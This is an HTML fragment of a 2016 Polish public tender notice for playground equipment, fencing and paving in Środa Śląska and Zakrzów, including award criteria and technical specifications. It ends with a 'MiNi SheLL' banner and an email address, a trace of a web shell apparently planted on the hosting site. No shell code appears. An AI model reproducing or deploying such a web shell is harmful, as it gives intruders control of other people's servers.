                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>gwarancja</td><td>20</td></tr><tr><td>estetyka</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy, chyba że konieczność takich zmian wynika z okoliczności,których nie można było przewidzieć w chwili zawarcia umowy. Do[puszcza się zmianę w przypadku:
a) zmiany stawki podatku vat 
b) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności, np. działania osób trzecich uniemożliwiające wykonanie zamówienia w terminie umownym,
b) wystąpienia siły wyższej tj. wydarzenia nieprzewidywalnego i poza kontrolą stron niniejszej umowy, występującej po podpisaniu umowy, a powodującego niemożność wywiązania się z umowy w jej obecnym brzmieniu;
c) zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego
2. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 27/09/2016, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Plac zabaw  przy ul. Stacyjnej w Środzie Śląskiej<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>CZĘŚĆ I PRZEDMIOTU ZAMÓWIENIA: Plac zabaw  przy ul. Stacyjnej w Środzie Śląskiej. 
Plac zabaw posiada nawierzchnię z piasku, zamontowane urządzenia zabawowe, ogrodzenie panelowe wys. 1,1 m  z furtką 
Zakres prac do wykonania :
a) Uzupełnienie wyposażenia placu zabaw polegające na dostawie i montażu:

	Huśtawki łańcuchowej  z siedziskiem  typu bocianie gniazdo   szt.1 
	Konstrukcja z rur stalowych ocynkowana metodą ogniową i malowana proszkowo, siedzisko 	bocianie gniazdo, łańcuchy ze stali nierdzewnej, układ wahadłowy nie wymagający 	konserwacji, 	ewentualne wypełnienia (niewymagane)  z tworzywa HDPE, długość zawiesi 	1,50 m,

	Karuzeli ażurowej z kierownicą  szt.1
	Konstrukcja z rur stalowych ocynkowana metodą ogniową i malowana proszkowo, średnica 	min. 	1,50 m, siedziska z płyty HDPE ,podłoga wykonana z blachy aluminiowej ryflowanej, 	układ 	łożyskowy nie wymagający konserwacji,ewentualne wypełnienia (niewymagane)  z 	tworzywa HDPE,  talerz napędowy ze stali nierdzewnej

	Ławki z oparciem   2 szt.
	Konstrukcja z rur stalowych ocynkowana metodą ogniową i malowana proszkowo, siedzisko z 	desek 	z drewna liściastego zabezpieczonego impregnatem o długości min. 1,9 i szerokości 	min. 0,46 m

	Kosza  1 szt
	Metalowy z daszkiem o pojemności min. 30 l

b) Powiększenie powierzchni placu zabaw poprzez:
	rozbiórkę i ponowny montaż istniejącego ogrodzenia panelowego na odcinku 16 mb ( przesunięcie dwóch boków)
	dostawę z montażem ogrodzenia panelowego o parametrach:
Panel ogrodzeniowy  wymiary 1230 mm x 2500 mm, typ ZPO2 z wygięciami wzmacnianymi z drutu poziomego i pionowego fi 4,8 mm, oczka 50 mm x 200 mm. 
Słupki systemowe z zaślepką  wymiary 60 mm x 40 mm, długość 1700 mm. 
Uchwyty montażowe wraz z kompletem śrub, nakrętek i podkładem ocynkowanych.
Wszystkie elementy zabezpieczone antykorozyjnie poprzez ocynkowanie i dodatkowo malowane proszkowo na kolor RAL 6005

c) Uzupełnienie podłoża piaskowego na powiększonej powierzchni placu zabaw poprzez :
	dostawę wraz z korytowaniem i rozplantowaniem piasku na  powiększanej powierzchni istniejącego placu zabaw  o łącznej powierzchni 8,4 m2.  
Podłoże z piasku płukanego frakcja  0,2-2 mm. Grubość warstwy piasku  30 cm. Dostarczony piasek nie powinien zawierać cząstek mułu i gliny oraz winien być dopuszczony do stosowania na placach zabaw.

d) Wykonanie chodnika i uzupełnienie obrzeży poprzez:
	dostawa z montażem obrzeży betonowych o wymiarach 20 x 6 cm  pod istniejącym i nowo wykonanym ogrodzeniem panelowym na łącznej długości 73,38 mb
	wykonanie koryta, podsypki piaskowej grubości 5 cm pod chodnik
	wykonanie chodnika z kostki betonowej  typu 40 (lub równoważnej) grubości 6 cm z wypełnieniem spoin piaskiem . Powierzchnia chodnika  7,1 m2

Załączony przedmiar robót jest dokumentem pomocniczym do oszacowania wartości zamówienia. 

Do oferty wykonawca może załączyć wypełniony kosztorys oraz  jednostkowe ceny (obejmujące łącznie wszystkie roboty i materiały) :
	dostawy wraz z  montażem poszczególnych  urządzeń zabawowych  w zł/ szt
	dostawy wraz z montażem ogrodzenia panelowego w zł/mb
	wykonania chodnika z kostki betonowej   w zł/ m2
	wykonania obrzeża   w zł/mb
	wykonania podłoża piaskowego    w zł/m2
Dostarczone urządzenia zabawowe powinny spełniać następujący wymogi:
	posiadać certyfikaty zgodności z normą PN-EN 1176 
	urządzenia winny być jednoznacznie oznakowane numerem katalogowym pozwalającym na ich identyfikację  w karcie technicznej urządzenia  oraz tym samym numerem katalogowym w certyfikatach zgodności z normą PN-EN  1176
	na urządzeniach, które są zainstalowane w podłożu powinien być umieszczony przez producenta czytelny znak poziomu podstawowego. Wskazuje on wysokość, na jakiej montaż gwarantuje stabilność sprzętu (znak ten powinien być równy z nawierzchnią lub płaszczyzną zabawy). 
	urządzenia powinny być oznakowane nazwą i adresem producenta lub upoważnionego przedstawiciela,numerem kolejnym, pozwalającym na indywidualną identyfikację (metryczki urządzenia i roku produkcji) oraz numerem i datą normy, której wymogom odpowiadają.
	montaż urządzeń zgodny z zatwierdzoną instrukcją

Wykonawca przekaże po wykonaniu robót:
	dokumentację techniczną, z kartami informacyjnymi o konstrukcji urządzeń , ich wymiarach,użytych materiałach, farbach i lakierach ,
	instrukcję użytkowania i montażu, włącznie z danymi na temat bezpiecznych odległości pomiędzy urządzeniami ,
	certyfikaty , badania i inne dokumenty potwierdzające zgodność sprzętu z normą  PN-EN 1176 
	pisemne potwierdzenie kompletności wykonania prac objętych zamówieniem i zgodności montażu z normą PN-EN 1176 ,
	 wypełnioną gwarancję jakości,  gwarancja na min. 36 m-cy (załącznik pn. Gwarancja jakości)
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45112723-9, 37535200-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/10/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>ena</td><td>60</td></tr><tr><td>gwarancja</td><td>20</td></tr><tr><td>estetyka</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Plac zabaw w miejscowości Zakrzów <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres prac do wykonania :
a) Uzupełnienie wyposażenia placu zabaw polegające na dostawie i montażu:

	Zjeżdżalni  szt..1
	Konstrukcja z rur stalowych ocynkowana metodą ogniową i malowana proszkowo, ślizg z 	blachy 	nierdzewnej długości min. 2,2 m , szerokości min. 0,5 m, wysokość  1,5 m, wypełnienia 	z tworzywa HDPE, podłoga ze sklejki wodoodpornej, schodki  gumowane lub z aluminiowej 	blachy 	antypoślizgowej. Maksymalna długość urządzenia 432,5 cm.

	Urządzenia wspinaczkowego typu Kopuła wspinaczkowa  szt.1
	Konstrukcja z rur stalowych ocynkowana metodą ogniową i malowana proszkowo, panele 	wspinaczkowe z tworzywa HDPE tworzące półkulę  poszczególne elementy w rożnych 	kolorach, średnica ok. fi 320 cm, wysokość ok. 150 cm, Do celów poglądowych podaje się wzór 	wyglądu urządzenia:  FUX SYSTEM RC.020 Kopuła.

b) Wykonanie podłoża piaskowego na  strefach bezpieczeństwa pod montowanymi urządzeniami poprzez :
	dostawę wraz z korytowaniem i rozplantowaniem piasku na  powierzchni wymaganych przepisami stref bezpieczeństwa.
Podłoże z piasku płukanego frakcja  0,2-2 mm. Grubość warstwy piasku  30 cm. Dostarczony piasek nie powinien zawierać cząstek mułu i gliny oraz winien być dopuszczony do stosowania na placach zabaw.

Dostarczone urządzenia zabawowe powinny spełniać następujący wymogi:
	posiadać certyfikaty zgodności z normą PN-EN 1176 
	urządzenia winny być jednoznacznie oznakowane numerem katalogowym pozwalającym na ich identyfikację  w karcie technicznej urządzenia  oraz tym samym numerem katalogowym w certyfikatach zgodności z normą PN-EN  1176
	na urządzeniach, które są zainstalowane w podłożu powinien być umieszczony przez producenta czytelny znak poziomu podstawowego. Wskazuje on wysokość, na jakiej montaż gwarantuje stabilność sprzętu (znak ten powinien być równy z nawierzchnią lub płaszczyzną zabawy). 
	urządzenia powinny być oznakowane nazwą i adresem producenta lub upoważnionego przedstawiciela,numerem kolejnym, pozwalającym na indywidualną identyfikację (metryczki urządzenia i roku produkcji) oraz numerem i datą normy, której wymogom odpowiadają.
	montaż urządzeń zgodny z zatwierdzoną instrukcją

Wykonawca przekaże po wykonaniu robót:
	dokumentację techniczną, z kartami informacyjnymi o konstrukcji urządzeń , ich wymiarach,użytych materiałach, farbach i lakierach ,
	instrukcję użytkowania i montażu, włącznie z danymi na temat bezpiecznych odległości pomiędzy urządzeniami ,
	certyfikaty , badania i inne dokumenty potwierdzające zgodność sprzętu z normą  PN-EN 1176 
	pisemne potwierdzenie kompletności wykonania prac objętych zamówieniem i zgodności montażu z normą PN-EN 1176 ,
	 wypełnioną gwarancję jakości,  gwarancja na min. 36 m-cy (załącznik pn. Gwarancja jakości)
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45112723-9, 37535200-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/10/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>gwarancja</td><td>20</td></tr><tr><td>estetyka </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com